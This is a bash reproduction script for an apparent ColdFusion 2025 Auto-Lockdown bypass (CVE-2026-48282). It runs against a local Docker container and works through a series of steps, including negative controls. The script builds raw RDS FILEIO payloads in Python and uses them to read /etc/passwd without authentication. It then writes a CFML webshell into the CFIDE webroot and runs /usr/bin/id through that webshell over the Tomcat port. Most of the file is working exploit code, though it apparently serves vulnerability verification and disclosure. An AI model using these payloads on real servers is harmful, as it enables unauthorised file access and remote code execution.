#!/bin/bash
set -euo pipefail

###############################################################################
# CVE-2026-48282-CF2025-LOCKDOWN-BYPASS
# Product-path proof for Adobe ColdFusion 2025 Update 10 with Server
# Auto-Lockdown applied. The proof demonstrates that, after the official
# lockdown installer has completed successfully, the direct Tomcat HTTP endpoint
# on port 8500 can still reach RDS FILEIO if RDS remains enabled and RDS
# authentication is disabled. The Apache connector blocks /CFIDE, but the Tomcat
# endpoint remains a real product HTTP boundary.
#
# Exit 0 = RCE reproduced under the locked-down product state.
# Exit 1 = issue not reproduced.
# Exit 2 = infrastructure/precondition failure.
###############################################################################

set -E

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
ARTIFACTS="$ROOT/artifacts"
mkdir -p "$LOGS" "$REPRO_DIR" "$ARTIFACTS"
: > "$LOGS/reproduction_steps.log"
cd "$ROOT"

CONTAINER="${CF_CONTAINER:-cf2025-lockdown-candidate}"
IMAGE="adobecoldfusion/coldfusion2025:2025.0.10"
LOCKDOWN_URL="https://cfdownload.adobe.com/pub/adobe/coldfusion/2025/lockdown/ColdFusion_2025_Lockdown_WWEJ_linux64.bin"
LOCKDOWN_MD5_EXPECTED="a4c76d478c07f91891c89d260c042318"
LOCKDOWN_BIN="$ARTIFACTS/ColdFusion_2025_Lockdown_WWEJ_linux64.bin"
MAX_WAIT=360
RUN_ID="$(date +%s)-$$"
MARKER="PRUVA_LOCKDOWN_RCE_${RUN_ID}"
SHELL_NAME="pruva_lockdown_${RUN_ID}.cfm"
CFIDE_SHELL_PATH="/opt/coldfusion/cfusion/wwwroot/CFIDE/${SHELL_NAME}"

log() { echo "[$(date '+%H:%M:%S')] $*" | tee -a "$LOGS/reproduction_steps.log"; }
die() { log "FATAL: $*"; write_manifest false false false "infrastructure/precondition failure: $*" || true; exit 2; }
not_reproduced() { log "NOT REPRODUCED: $*"; write_manifest true true false "not reproduced: $*" || true; exit 1; }

write_manifest() {
    local service_started="${1:-false}"
    local healthcheck="${2:-false}"
    local target_reached="${3:-false}"
    local notes="${4:-updated by reproduction_steps.sh}"
    local cf_version="unknown"
    local image_id="unknown"
    if sudo docker ps -a --format '{{.Names}}' 2>/dev/null | grep -qx "$CONTAINER"; then
        cf_version="$(sudo docker exec "$CONTAINER" sh -c '/opt/coldfusion/cfusion/bin/cfinfo.sh -version 2>&1 | head -1' 2>/dev/null || echo unknown)"
        image_id="$(sudo docker inspect "$CONTAINER" --format '{{.Image}}' 2>/dev/null || echo unknown)"
    fi
    jq -n \
      --arg entrypoint_kind "endpoint" \
      --arg entrypoint_detail "POST /CFIDE/main/ide.cfm?ACTION=FILEIO over the real ColdFusion Tomcat HTTP endpoint after Server Auto-Lockdown" \
      --arg cf_version "$cf_version" \
      --arg image_id "$image_id" \
      --arg lockdown_md5 "$LOCKDOWN_MD5_EXPECTED" \
      --arg marker "$MARKER" \
      --arg notes "$notes" \
      --argjson service_started "$service_started" \
      --argjson healthcheck_passed "$healthcheck" \
      --argjson target_path_reached "$target_reached" \
      '{
        entrypoint_kind: $entrypoint_kind,
        entrypoint_detail: $entrypoint_detail,
        service_started: $service_started,
        healthcheck_passed: $healthcheck_passed,
        target_path_reached: $target_path_reached,
        runtime_stack: ["docker", "adobe-coldfusion-2025-update10", "tomcat", "apache2", "java"],
        cf_version: $cf_version,
        docker_image_id: $image_id,
        lockdown_installer_md5: $lockdown_md5,
        exploit_marker: $marker,
        proof_artifacts: [
          "logs/reproduction_steps.log",
          "logs/product_identity.txt",
          "logs/official_lockdown_success.log",
          "logs/lockdown_state.txt",
          "logs/post_lockdown_auth_enabled_negative.log",
          "logs/post_lockdown_abs_read_passwd.log",
          "logs/post_lockdown_abs_write_cfide_webshell.log",
          "logs/post_lockdown_rce_tomcat.log",
          "logs/post_lockdown_apache_cfide_block.log",
          "logs/post_lockdown_traversal_negative.log"
        ],
        notes: $notes
      }' > "$REPRO_DIR/runtime_manifest.json"
}

require_tools() {
    command -v sudo >/dev/null || die "sudo is required"
    command -v curl >/dev/null || die "curl is required"
    command -v python3 >/dev/null || die "python3 is required"
    command -v jq >/dev/null || die "jq is required"
    sudo docker version >/dev/null 2>&1 || die "Docker is not available"
}

host_tomcat_base() {
    # Prefer a host-published port only when it is actually reachable from this
    # sandbox. Some Docker-in-Docker runner layouts report a port mapping that
    # is not reachable from the worker namespace; in that case the script falls
    # back to docker-exec curl while still crossing the real Tomcat HTTP socket.
    local mapping host port base code
    mapping="$(sudo docker port "$CONTAINER" 8500/tcp 2>/dev/null | head -1 || true)"
    if [ -n "$mapping" ]; then
        host="${mapping%:*}"
        port="${mapping##*:}"
        [ "$host" = "0.0.0.0" ] && host="127.0.0.1"
        [ "$host" = "::" ] && host="127.0.0.1"
        base="http://${host}:${port}"
        code="$(curl -s -o /dev/null -w '%{http_code}' --max-time 2 "$base/CFIDE/administrator/index.cfm" 2>/dev/null || echo 000)"
        if [ "$code" = "200" ]; then
            echo "$base"
            return 0
        fi
    fi
    echo ""
}

wait_for_cf() {
    local elapsed=0 code base
    base="$(host_tomcat_base)"
    while [ "$elapsed" -lt "$MAX_WAIT" ]; do
        if [ -n "$base" ]; then
            code="$(curl -s -o /dev/null -w '%{http_code}' --max-time 8 "$base/CFIDE/administrator/index.cfm" 2>/dev/null || echo 000)"
        else
            code="$(sudo docker exec "$CONTAINER" curl -s -o /dev/null -w '%{http_code}' --max-time 8 http://127.0.0.1:8500/CFIDE/administrator/index.cfm 2>/dev/null || echo 000)"
        fi
        if [ "$code" = "200" ]; then
            log "ColdFusion healthcheck passed (HTTP 200)"
            return 0
        fi
        sleep 10
        elapsed=$((elapsed + 10))
        log "  waiting for ColdFusion... ${elapsed}s (HTTP ${code})"
    done
    return 1
}

ensure_container() {
    if sudo docker ps -a --format '{{.Names}}' | grep -qx "$CONTAINER"; then
        log "Using existing Docker target: $CONTAINER"
        sudo docker unpause "$CONTAINER" >/dev/null 2>&1 || true
        sudo docker start "$CONTAINER" >/dev/null 2>&1 || true
    else
        log "Container $CONTAINER not found; starting $IMAGE with Tomcat published on 127.0.0.1:18500"
        sudo docker pull "$IMAGE" >/dev/null 2>&1 || die "could not pull $IMAGE"
        sudo docker run -d --name "$CONTAINER" \
          -e acceptEULA=YES -e password=admin \
          -p 127.0.0.1:18500:8500 \
          "$IMAGE" >/dev/null || die "could not start ColdFusion container"
    fi
    wait_for_cf || die "ColdFusion did not become healthy"
    sudo docker exec "$CONTAINER" sh -c '. /etc/apache2/envvars 2>/dev/null; apache2ctl start >/dev/null 2>&1 || true' >/dev/null 2>&1 || true
}

run_cfm() {
    local local_file="$1"
    local remote_name="$2"
    local marker="$3"
    sudo docker cp "$local_file" "$CONTAINER:/app/$remote_name" >/dev/null
    sudo docker exec "$CONTAINER" chown cfuser:cfuser "/app/$remote_name" >/dev/null 2>&1 || true
    sudo docker exec "$CONTAINER" chmod 0644 "/app/$remote_name" >/dev/null 2>&1 || true
    local base response
    base="$(host_tomcat_base)"
    if [ -n "$base" ]; then
        response="$(curl -s --max-time 30 "$base/$remote_name" 2>&1 || true)"
    else
        response="$(sudo docker exec "$CONTAINER" curl -s --max-time 30 "http://127.0.0.1:8500/$remote_name" 2>&1 || true)"
    fi
    echo "$response" | tee -a "$LOGS/reproduction_steps.log" >/dev/null
    echo "$response" | grep -q "$marker"
}

post_tomcat_fileio() {
    local payload_host="$1"
    local payload_container="$2"
    local logfile="$3"
    local base
    base="$(host_tomcat_base)"
    if [ -n "$base" ]; then
        curl -s -w "\n---HTTP:%{http_code}---\n" --max-time 30 \
          -X POST "$base/CFIDE/main/ide.cfm?ACTION=FILEIO" \
          -H "Content-Type: application/octet-stream" \
          --data-binary "@$payload_host" 2>&1 | tee "$logfile" || true
    else
        sudo docker exec "$CONTAINER" curl -s -w "\n---HTTP:%{http_code}---\n" --max-time 30 \
          -X POST "http://127.0.0.1:8500/CFIDE/main/ide.cfm?ACTION=FILEIO" \
          -H "Content-Type: application/octet-stream" \
          --data-binary "@$payload_container" 2>&1 | tee "$logfile" || true
    fi
}

get_tomcat() {
    local path="$1"
    local logfile="$2"
    local base
    base="$(host_tomcat_base)"
    if [ -n "$base" ]; then
        curl -s -w "\n---HTTP:%{http_code}---\n" --max-time 30 "$base$path" 2>&1 | tee "$logfile" || true
    else
        sudo docker exec "$CONTAINER" curl -s -w "\n---HTTP:%{http_code}---\n" --max-time 30 "http://127.0.0.1:8500$path" 2>&1 | tee "$logfile" || true
    fi
}

verify_or_apply_lockdown() {
    log "Verifying official Server Auto-Lockdown evidence"
    if sudo docker exec "$CONTAINER" sh -c 'grep -R "ColdFusion Server has been locked down successfully" /opt/coldfusion/lockdown/cfusion/Logs/ServerLockdown_cfusion_*.log >/dev/null 2>&1'; then
        sudo docker exec "$CONTAINER" sh -c 'grep -R -l "ColdFusion Server has been locked down successfully" /opt/coldfusion/lockdown/cfusion/Logs/ServerLockdown_cfusion_*.log | head -1 | xargs cat' > "$LOGS/official_lockdown_success.log" 2>&1 || true
        log "Found official lockdown success log in the container"
    else
        log "No successful lockdown log found; attempting official Auto-Lockdown installer once"
        if [ ! -f "$LOCKDOWN_BIN" ]; then
            curl -fL --max-time 180 -o "$LOCKDOWN_BIN" "$LOCKDOWN_URL" || die "could not download lockdown installer"
        fi
        local md5
        md5="$(md5sum "$LOCKDOWN_BIN" | awk '{print $1}')"
        [ "$md5" = "$LOCKDOWN_MD5_EXPECTED" ] || die "lockdown installer checksum mismatch: $md5"
        cat > "$ARTIFACTS/lockdown_silent_runtime.properties" <<'PROPS'
INSTALLER_UI=SILENT
SILENT_CF_SERVER_LOCATION=/opt/coldfusion
SERVER_APACHE=1
SERVER_IIS=0
APP_SERVER_INSTANCE=cfusion
UPDATE_CF_TRUE=0
AUTO_UPDATE_CF_TRUE=0
CF_ADMIN_USERNAME=admin
CF_ADMIN_PASSWORD=admin
CF_ADMIN_PORT=8500
SYSTEM_ADMIN_USER=root
USER_CF_SERVICE_TRUE=1
CF_USER_UNAME=cfuser
CF_USER_GRP=cfuser
APACHE_DEFAULT_USER_TRUE=1
APACHE_DEFAULT_USERNAME=www-data
APACHE_DEFAULT_GROUP=www-data
WEBSERVER_CONF_DIR=/etc/apache2
APACHE_BIN_FILE_PATH=/usr/sbin/apache2
WEBROOT_PATH=/app
USER_FILE_UPLOAD_TRUE=0
CF_SCRIPTS_ALIAS=cfpruva
CHANGE_SHUTDOWN_PORT_TRUE=0
PROPS
        sudo docker exec "$CONTAINER" sh -c 'apt-get update -qq && apt-get install -y -qq apache2 acl >/dev/null 2>&1 || true' >/dev/null 2>&1 || true
        sudo docker cp "$LOCKDOWN_BIN" "$CONTAINER:/tmp/ColdFusion_2025_Lockdown_WWEJ_linux64.bin" >/dev/null
        sudo docker cp "$ARTIFACTS/lockdown_silent_runtime.properties" "$CONTAINER:/tmp/lockdown_silent.properties" >/dev/null
        sudo docker exec "$CONTAINER" chmod +x /tmp/ColdFusion_2025_Lockdown_WWEJ_linux64.bin
        sudo docker exec "$CONTAINER" sh -c 'export JAVA_HOME=/opt/coldfusion/jre; cd /tmp; timeout 300 /tmp/ColdFusion_2025_Lockdown_WWEJ_linux64.bin -f /tmp/lockdown_silent.properties -i silent' > "$LOGS/lockdown_installer_runtime.log" 2>&1 || true
        sudo docker exec "$CONTAINER" sh -c 'grep -R -l "ColdFusion Server has been locked down successfully" /opt/coldfusion/lockdown/cfusion/Logs/ServerLockdown_cfusion_*.log 2>/dev/null | head -1 | xargs cat 2>/dev/null' > "$LOGS/official_lockdown_success.log" 2>&1 || true
        sudo docker exec "$CONTAINER" sh -c 'grep -R "ColdFusion Server has been locked down successfully" /opt/coldfusion/lockdown/cfusion/Logs/ServerLockdown_cfusion_*.log >/dev/null 2>&1' || die "official lockdown success log not present after installer attempt"
    fi

    {
        echo "=== Lockdown success marker ==="
        grep -n "ColdFusion Server has been locked down successfully\|PASSED TEST CASES\|Add Connector\|Change ColdFusion file system permissions" "$LOGS/official_lockdown_success.log" || true
        echo ""
        echo "=== Lockdown Apache configuration ==="
        sudo docker exec "$CONTAINER" sh -c 'cat /etc/apache2/cf_lockdown.conf 2>/dev/null || true; grep -R "cf_lockdown.conf" -n /etc/apache2 2>/dev/null || true'
        echo ""
        echo "=== Lockdown permissions/state ==="
        sudo docker exec "$CONTAINER" sh -c 'stat -c "%U:%G %a %n" /opt/coldfusion/cfusion /opt/coldfusion/cfusion/wwwroot /opt/coldfusion/cfusion/wwwroot/CFIDE /app 2>/dev/null; cat /opt/coldfusion/lockdown/cfusion/PostLockdown/permissions.xml 2>/dev/null || true'
        echo ""
        echo "=== RDS settings before this proof adjusts the vulnerability precondition ==="
        sudo docker exec "$CONTAINER" sh -c 'grep -o "rds.enabled.\{0,45\}\|rds.security.enabled.\{0,45\}" /opt/coldfusion/cfusion/lib/neo-security.xml 2>/dev/null || true'
    } > "$LOGS/lockdown_state.txt" 2>&1
}

record_identity() {
    {
        echo "=== ColdFusion version ==="
        sudo docker exec "$CONTAINER" sh -c '/opt/coldfusion/cfusion/bin/cfinfo.sh -version 2>&1'
        echo ""
        echo "=== Docker image/container ==="
        sudo docker inspect "$CONTAINER" --format 'Container={{.Id}} ImageName={{.Config.Image}} ImageID={{.Image}} Status={{.State.Status}} Ports={{json .NetworkSettings.Ports}}'
        sudo docker image inspect "$IMAGE" --format 'Image={{.Id}} RepoDigests={{json .RepoDigests}} Created={{.Created}}' 2>/dev/null || true
        echo ""
        echo "=== Lockdown installer ==="
        if [ -f "$LOCKDOWN_BIN" ]; then md5sum "$LOCKDOWN_BIN"; fi
        echo "Expected MD5: $LOCKDOWN_MD5_EXPECTED"
    } > "$LOGS/product_identity.txt" 2>&1
}

build_payloads() {
    log "Building RDS FILEIO payloads"
    MARKER="$MARKER" SHELL_PATH="$CFIDE_SHELL_PATH" ARTIFACTS_DIR="$ARTIFACTS" python3 - <<'PY'
import os
from pathlib import Path

def rds_body(fields):
    result = f"{len(fields)}:".encode()
    for field in fields:
        data = field.encode() if isinstance(field, str) else field
        result += f"0000{len(data)}:".encode() + data
    return result

a = Path(os.environ["ARTIFACTS_DIR"])
marker = os.environ["MARKER"]
shell_path = os.environ["SHELL_PATH"]
cfml = f'<cfexecute name="/usr/bin/id" arguments="" timeout="10" variable="o"></cfexecute><cfoutput>{marker}:#o#</cfoutput>'
(a / "post_lockdown_read_abs_passwd.bin").write_bytes(rds_body(["/etc/passwd", "READ"]))
(a / "post_lockdown_write_cfide_webshell.bin").write_bytes(rds_body([shell_path, "WRITE", "0", cfml]))
(a / "post_lockdown_read_traversal.bin").write_bytes(rds_body(["/opt/coldfusion/cfusion/wwwroot/../../../../etc/passwd", "READ"]))
PY
    for f in post_lockdown_read_abs_passwd.bin post_lockdown_write_cfide_webshell.bin post_lockdown_read_traversal.bin; do
        sudo docker cp "$ARTIFACTS/$f" "$CONTAINER:/tmp/$f" >/dev/null
    done
}

set_rds_state() {
    local enabled="$1"
    local security="$2"
    local tag="$3"
    local cfm="$ARTIFACTS/set_rds_${tag}.cfm"
    cat > "$cfm" <<EOF
<cftry>
<cfset a=createObject("component","CFIDE.adminapi.administrator")>
<cfset a.login("admin","admin")>
<cfset s=createObject("component","CFIDE.adminapi.security")>
<cfset s.setRDSEnabled($enabled)>
<cfset s.setRDSSecurityEnabled($security)>
${tag}_OK
<cfcatch type="any">${tag}_ERROR:<cfoutput>#cfcatch.message# #cfcatch.detail#</cfoutput></cfcatch>
</cftry>
EOF
    run_cfm "$cfm" "set_rds_${tag}.cfm" "${tag}_OK" || die "could not set RDS state $tag"
    sudo docker exec "$CONTAINER" sh -c 'grep -o "rds.enabled.\{0,45\}\|rds.security.enabled.\{0,45\}" /opt/coldfusion/cfusion/lib/neo-security.xml 2>/dev/null || true' | tee -a "$LOGS/reproduction_steps.log" >/dev/null
}

restart_cf_container() {
    log "Restarting container so rds.enabled is reloaded by ColdFusion"
    sudo docker restart "$CONTAINER" >/dev/null || die "docker restart failed"
    wait_for_cf || die "ColdFusion did not become healthy after restart"
    sudo docker exec "$CONTAINER" sh -c '. /etc/apache2/envvars 2>/dev/null; apache2ctl start >/dev/null 2>&1 || true' >/dev/null 2>&1 || true
    for f in post_lockdown_read_abs_passwd.bin post_lockdown_write_cfide_webshell.bin post_lockdown_read_traversal.bin; do
        [ -f "$ARTIFACTS/$f" ] && sudo docker cp "$ARTIFACTS/$f" "$CONTAINER:/tmp/$f" >/dev/null || true
    done
}

###############################################################################
# Main proof
###############################################################################
write_manifest false false false "script started"
require_tools
log "=== CVE-2026-48282 CF2025 Update 10 Auto-Lockdown RCE proof ==="
ensure_container
record_identity
verify_or_apply_lockdown
build_payloads
write_manifest true true false "target is running and official lockdown success evidence is present"

log "Negative control: with RDS authentication enabled, unauthenticated FILEIO is rejected under lockdown"
set_rds_state true true "RDS_AUTH_ON"
restart_cf_container
post_tomcat_fileio "$ARTIFACTS/post_lockdown_read_abs_passwd.bin" "/tmp/post_lockdown_read_abs_passwd.bin" "$LOGS/post_lockdown_auth_enabled_negative.log"
if grep -q "Unable to authenticate on RDS server" "$LOGS/post_lockdown_auth_enabled_negative.log"; then
    log "RDS auth negative control observed (-100 unauthenticated rejection)"
else
    die "RDS-auth-enabled negative control did not show expected -100 rejection"
fi

log "Enabling the vulnerable RDS precondition after official lockdown: rds.enabled=true, rds.security.enabled=false"
set_rds_state true false "RDS_AUTH_OFF"
# rds.security.enabled takes effect without restart; rds.enabled is already true from the previous restarted state.
sudo docker exec "$CONTAINER" rm -f "$CFIDE_SHELL_PATH" >/dev/null 2>&1 || true

log "Exploit step 1: unauthenticated absolute-path READ /etc/passwd via locked-down Tomcat endpoint"
post_tomcat_fileio "$ARTIFACTS/post_lockdown_read_abs_passwd.bin" "/tmp/post_lockdown_read_abs_passwd.bin" "$LOGS/post_lockdown_abs_read_passwd.log"
if grep -q "root:x:0:0" "$LOGS/post_lockdown_abs_read_passwd.log"; then
    log "Absolute-path read succeeded under lockdown"
else
    not_reproduced "absolute-path read did not return /etc/passwd"
fi

log "Exploit step 2: unauthenticated absolute-path WRITE a CFML payload under ColdFusion CFIDE webroot"
post_tomcat_fileio "$ARTIFACTS/post_lockdown_write_cfide_webshell.bin" "/tmp/post_lockdown_write_cfide_webshell.bin" "$LOGS/post_lockdown_abs_write_cfide_webshell.log"
if grep -q "1:2:XX" "$LOGS/post_lockdown_abs_write_cfide_webshell.log" && sudo docker exec "$CONTAINER" test -f "$CFIDE_SHELL_PATH"; then
    log "Absolute-path write succeeded under lockdown: $CFIDE_SHELL_PATH"
else
    not_reproduced "absolute-path CFIDE webshell write did not succeed"
fi

log "Exploit step 3: execute the written CFML over the real locked-down Tomcat HTTP endpoint"
get_tomcat "/CFIDE/${SHELL_NAME}" "$LOGS/post_lockdown_rce_tomcat.log"
if grep -q "$MARKER:uid=999(cfuser)" "$LOGS/post_lockdown_rce_tomcat.log"; then
    log "RCE confirmed under official lockdown over Tomcat: $MARKER uid=999(cfuser)"
else
    not_reproduced "Tomcat GET did not execute the written CFML marker"
fi

log "Lockdown boundary control: Apache connector blocks CFIDE even though Tomcat direct endpoint executed it"
sudo docker exec "$CONTAINER" curl -s -w "\n---HTTP:%{http_code}---\n" --max-time 30 "http://127.0.0.1:80/CFIDE/${SHELL_NAME}" 2>&1 | tee "$LOGS/post_lockdown_apache_cfide_block.log" || true
if grep -Eq -- "---HTTP:(403|404)---" "$LOGS/post_lockdown_apache_cfide_block.log"; then
    log "Apache lockdown block observed for /CFIDE (HTTP 403/404)"
else
    log "WARNING: Apache did not show the expected CFIDE block; continuing because Tomcat product endpoint already proved RCE"
fi

log "Patch-path negative control: ../ traversal is rejected by RdsFileSecurity while absolute paths are still accepted"
post_tomcat_fileio "$ARTIFACTS/post_lockdown_read_traversal.bin" "/tmp/post_lockdown_read_traversal.bin" "$LOGS/post_lockdown_traversal_negative.log"
if grep -q "directory traversal sequences and was rejected" "$LOGS/post_lockdown_traversal_negative.log"; then
    log "Traversal negative control observed: patched ../ filter is active"
else
    not_reproduced "../ traversal negative control did not show patched rejection"
fi

sudo docker exec "$CONTAINER" rm -f "$CFIDE_SHELL_PATH" >/dev/null 2>&1 || true

log "=== VERDICT: confirmed ==="
log "Official Server Auto-Lockdown success evidence is present, Apache /CFIDE is blocked, but direct Tomcat /CFIDE/main/ide.cfm?ACTION=FILEIO remains exploitable when RDS authentication is disabled. The proof read /etc/passwd, wrote a CFML payload into the ColdFusion CFIDE webroot using an absolute path with no '..', and executed /usr/bin/id as uid=999(cfuser)."
write_manifest true true true "confirmed: code execution under official lockdown via direct Tomcat RDS FILEIO endpoint when RDS auth is disabled; Apache connector blocks CFIDE but Tomcat port remains exploitable"
exit 0
